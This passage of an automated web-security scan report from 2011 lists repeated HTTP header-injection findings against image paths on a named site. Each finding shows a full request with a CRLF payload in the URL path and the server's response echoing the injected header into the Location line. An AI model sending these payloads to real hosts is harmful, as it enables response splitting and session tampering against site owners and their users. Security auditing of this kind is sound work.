Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/fa623
91d1427d552
/Rsidepanel_mid-specials.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/fa623
91d1427d552/Rsidepanel_m
...[SNIP]...

1.17. http://utdi.reachlocal.net/images/Rsidepanel_mid.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_mid.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7cffb%0d%0ae67eb0e78d0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7cffb%0d%0ae67eb0e78d0/Rsidepanel_mid.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:23 GMT
Server: Apache
Location: http://utdi.com/7cffb
e67eb0e78d0
/Rsidepanel_mid.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/7cffb
e67eb0e78d0/Rsidepanel_m
...[SNIP]...

1.18. http://utdi.reachlocal.net/images/back-front.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/back-front.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d3b2%0d%0a658a9609ca0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d3b2%0d%0a658a9609ca0/back-front.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/3d3b2
658a9609ca0
/back-front.jpg
Vary: Accept-Encoding
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:11 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3d3b2
658a9609ca0/back-front.j
...[SNIP]...

1.19. http://utdi.reachlocal.net/images/banr_techcorner.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/banr_techcorner.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9f5da%0d%0a4c3efec7957 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9f5da%0d%0a4c3efec7957/banr_techcorner.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:05 GMT
Server: Apache
Location: http://utdi.com/9f5da
4c3efec7957
/banr_techcorner.jpg
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/9f5da
4c3efec7957/banr_techcor
...[SNIP]...

1.20. http://utdi.reachlocal.net/images/box-1.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/box-1.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e96a7%0d%0a0a5e41817ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e96a7%0d%0a0a5e41817ac/box-1.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:26 GMT
Server: Apache
Location: http://utdi.com/e96a7
0a5e41817ac
/box-1.jpg
Vary: Accept-Encoding
Content-Length: 297
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:19 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/e96a7
0a5e41817ac/box-1.jpg">h
...[SNIP]...

1.21. http://utdi.reachlocal.net/images/box-enews.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/box-enews.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b64f6%0d%0a348ab3e51c0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b64f6%0d%0a348ab3e51c0/box-enews.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:23 GMT
Server: Apache
Location: http://utdi.com/b64f6
348ab3e51c0
/box-enews.jpg
Vary: Accept-Encoding
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:16 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/b64f6
348ab3e51c0/box-enews.jp
...[SNIP]...

1.22. http://utdi.reachlocal.net/images/gpx_avaya_ip500sml.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/gpx_avaya_ip500sml.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fac4e%0d%0ab27292b2e6f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fac4e%0d%0ab27292b2e6f/gpx_avaya_ip500sml.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:04 GMT
Server: Apache
Location: http://utdi.com/fac4e
b27292b2e6f
/gpx_avaya_ip500sml.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/fac4e
b27292b2e6f/gpx_avaya_ip
...[SNIP]...

1.23. http://utdi.reachlocal.net/images/icon_orangecheckball.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/icon_orangecheckball.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3fb1b%0d%0af3643349a48 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3fb1b%0d%0af3643349a48/icon_orangecheckball.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/3fb1b
f3643349a48
/icon_orangecheckball.gif
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3fb1b
f3643349a48/icon_orangec
...[SNIP]...

1.24. http://utdi.reachlocal.net/images/logo-cisco-webex-main.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo-cisco-webex-main.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 94032%0d%0afddf97333c8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /94032%0d%0afddf97333c8/logo-cisco-webex-main.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:22 GMT
Server: Apache
Location: http://utdi.com/94032
fddf97333c8
/logo-cisco-webex-main.gif
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:14 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/94032
fddf97333c8/logo-cisco-w
...[SNIP]...

1.25. http://utdi.reachlocal.net/images/logo_carousel.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo_carousel.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5253f%0d%0a9daeaf8bf0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5253f%0d%0a9daeaf8bf0/logo_carousel.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/5253f
9daeaf8bf0
/logo_carousel.jpg
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/5253f
9daeaf8bf0/logo_carousel
...[SNIP]...

1.26. http://utdi.reachlocal.net/images/logo_cisco_footer.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo_cisco_footer.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12683%0d%0a12b8b2e3681 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /images12683%0d%0a12b8b2e3681/logo_cisco_footer.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/images12683
12b8b2e3681
/logo_cisco_footer.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images12683
12b8b2e3681/logo_c
...[SNIP]...

1.27. http://utdi.reachlocal.net/images/logo_nortel4.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo_nortel4.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 71fda%0d%0a954ff42a597 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /71fda%0d%0a954ff42a597/logo_nortel4.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:20 GMT
Server: Apache
Location: http://utdi.com/71fda
954ff42a597
/logo_nortel4.jpg
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/71fda
954ff42a597/logo_nortel4
...[SNIP]...

1.28. http://utdi.reachlocal.net/images/mainhead_partners.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainhead_partners.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f3e47%0d%0a28fa46348f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f3e47%0d%0a28fa46348f5/mainhead_partners.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/f3e47
28fa46348f5
/mainhead_partners.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/f3e47
28fa46348f5/mainhead_par
...[SNIP]...

1.29. http://utdi.reachlocal.net/images/mainhead_smartbuys.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainhead_smartbuys.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7ccfa%0d%0acc135bb4afe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /images7ccfa%0d%0acc135bb4afe/mainhead_smartbuys.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:03 GMT
Server: Apache
Location: http://utdi.com/images7ccfa
cc135bb4afe
/mainhead_smartbuys.jpg
Vary: Accept-Encoding
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images7ccfa
cc135bb4afe/mainhe
...[SNIP]...

1.30. http://utdi.reachlocal.net/images/mainpic_blueguy.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainpic_blueguy.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c530b%0d%0ad59940e884 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c530b%0d%0ad59940e884/mainpic_blueguy.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
